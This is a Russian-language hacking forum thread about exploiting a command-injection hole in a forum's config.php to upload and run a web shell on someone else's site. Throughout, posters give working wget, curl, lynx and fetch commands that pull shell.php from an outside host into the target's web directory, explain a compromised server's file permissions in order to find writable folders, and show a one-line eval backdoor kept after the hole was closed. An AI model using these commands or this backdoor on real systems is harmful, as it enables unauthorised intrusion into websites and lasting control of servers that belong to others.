я вот через эксплоит получил такой запрос http://www.site.org/forum/data/config.php?shell= kак мне теперь залить чтонибудь через браузер? пример плх если можно)
http://www.site.org/forum/data/config.php?shell=http://wwwsite2.org/shell.php где http://wwwsite2.org/shell.php путь до твоего шелла, а потом через него уже закачиваешь. можно еще так: http://www.site.org/forum/data/config.php?shell=cd /tmp/;wget http://wwwsite2.org/shell.php;wget http://wwwsite2.org/shell2.php; ls второй способ был в одном из видео. вроде про zbrute
http://www.site.org/forum/data/config.php?shell=тут_ты_выполняешь команды найди папку на запись и залей тут web-shell от rst57 (так как на нем легче работать/удобнее) http://www.site.org/forum/data/config.php?shell=wget -O /home/site.org/soft/shell.php http://site.ru/shell.php и потом через браузер переходи: www.site.org/soft/shell.php Насчет команд почитать/перейти
http://www.site.org/forum/data/config.php?shell=wich wget http://www.site.org/forum/data/config.php?shell=wget http://www.твой_сайт.ру/шелл.php но шелл надо залить себе на ftp(хост и т.д) и потом только оттуда сливать. А если ты не залил, тогда конечно не получиться http://www.site.org/forum/data/config.php?shell=curl http://www.твой_сайт.ру/шелл.php>shell.php
сперва http://www.site.org/forum/data/config.php?shell=wich wget потом http://www.site.org/forum/data/config.php?shell=wget http://www.твой_сайт.ру/шелл.php и потом переходим по урлу ...
а кроме wget и curl есть какие нибудь запросы для того чтобы залить шелл, потому что wget и curl не работают...
curl --output /papka/na/servere/shell.php http://site.com/shell.php wget -o /papka/na/servere/shell.php http://site.com/shell.php get http://site.com/shell.php > /papka/na/servere/shell.php links -source "http://site.com/shell.php" > /papka/na/servere/shell.php lynx -source http://site.com/shell.php > /papka/na/servere/shell.php fetch -o /papka/na/servere/shell.php http://site.com/shell.php
да жалко не одна комманда не работает но всётаки спасибо а нету ли такой комманды каторая скачивает все файл каторые находится в /home/mysite/ ?
привет ! помогите ! как залить файл в директорию с сайтом. льется только в папку с tmp. и как сменить права пользователя? что бы можно было залить файл в дирикторию сайта. и как прочитать файл командой что бы можно было код посмотреть?
добовляем допустим на исполнения chmod +x, читаем файл cat, смотрим какие прова на каталогах, папках ls -la да ты кто в системи посмотреть id....
uid=100(httpd) gid=103(httpd) groups=103(httpd) total 104 drwx--xr-x 15 meadow meadow 4096 Sep 17 11:09 . d---rwx--t 23 root meadow 4096 Jun 4 2010 .. drwx---r-x 3 meadow meadow 4096 Jan 17 13:25 admin drwxr-xr-x 4 meadow meadow 4096 Jun 5 2009 awstats drwxr-xr-x 5 meadow meadow 4096 Jun 5 2009 cgi-bin drwxr-xr-x 3 meadow meadow 4096 Jun 5 2009 cp drwxr-xr-x 2 meadow meadow 4096 Dec 13 2009 documentation -rw-r--r-- 1 meadow meadow 1334 Jun 5 2009 favicon.ico -rw-r--r-- 1 meadow meadow 303 Jun 5 2009 .htaccess drwx---r-x 17 meadow meadow 4096 Jan 7 11:47 images drwxr-xr-x 2 meadow meadow 4096 Jun 5 2009 images_original -rw-r--r-- 1 meadow meadow 4498 Jun 5 2009 index_original.html -rw-r--r-- 1 meadow meadow 692 Apr 14 2010 index.php -rw-r--r-- 1 meadow meadow 690 Sep 15 08:29 index_rss.php -rw-r--r-- 1 meadow meadow 4499 Jun 5 2009 login.html drwxr-xr-x 2 meadow meadow 4096 Oct 3 08:45 m drwxr-xr-x 2 meadow meadow 4096 Feb 25 14:45 old drwx---r-x 19 meadow meadow 4096 Dec 18 09:56 pages -rw-r--r-- 1 meadow meadow 22 Jun 5 2009 phpinfo.php -rw-r--r-- 1 meadow meadow 50 Jun 5 2009 robots.txt drwxr-xr-x 2 meadow meadow 4096 Sep 14 18:09 rss -rw-r--r-- 1 meadow meadow 1395 Sep 15 08:23 rss.php drwx---r-x 3 meadow meadow 4096 Sep 30 07:27 structure drwx-----x 2 meadow meadow 4096 Mar 14 02:05 webalizer обьясните?
ты пользователь httpd, твоя группа httpd, файлы и папки - пользователь и группа "meadow", на эти папки след права: смотрим самое лево, первая буква - указание на дикекторию (d - папка, - файл, webalizer - это папка, rss.php - это файл), потом 3 буквы - права пользователя, r - чтение, w - запись, x - выполнение. (для папок выполнение = открытие). Потом 3 буквы - права для группы, и последние 3 буквы - права для всех остальных. Теперь конкретный пример. drwx-----x 2 meadow meadow 4096 Mar 14 02:05 webalizer Пользователь meadow может читать папку, может писать в папку и может открывать папку (если в папку можно читать, но нельзя открывать, то файл (зная его имя) из папки можно получить, а получить список файлов в папке нельзя). drwx-----x 2 meadow meadow 4096 Mar 14 02:05 webalizer Пользователи входящие в группу meadow (просто имя пользователя и имя группы совпадают. Так же как в винде есть пользователь Администратор, и есть группа Администраторы), за исключением самого пользователя meadow (на него действуют права пользователя, а не группы, потому что права пользователя более конкретны) имеют права на ничего. Они не могут ни читать папку, ни писать в папку, не листать ее. drwx-----x 2 meadow meadow 4096 Mar 14 02:05 webalizer Это права для всех остальных. (кто не пользователь meadow и не в группе meadow). Так вот все остальные имеют право листать папку. В принципе залить что либо сюда ты не можешь. Но можешь поискать подпапки с права rwxrwxrwx (вполне могут быть, во многих руководствах пишут "Выставите права 777" и многие следуют этому глупому совету)
была уязвимость на сайте, залил шелл: shell.php <?php eval($_REQUEST[cmd]); ?> то есть, site.ru/.../shell.php?cmd=echo("Hello"); // выведет Hello щас дыру закрыли, не успел толком ничего сделать, а шелл остался работать, команды system(), exec() и подобные работают. Как мне на сервак еще залить файлы? возможно открыть ftp сервер там или порты какие-нибудь? сделать его прокси сервером... Версия php 5.3.2-1 ОС Ubuntu 4.18
инклуд здесь работает только локально. Кстати, можно как нибудь изменить php.ini и включить инклуд командами system() или exec()? путь /etc/php5/apache2/php.ini или это в httpd.conf?
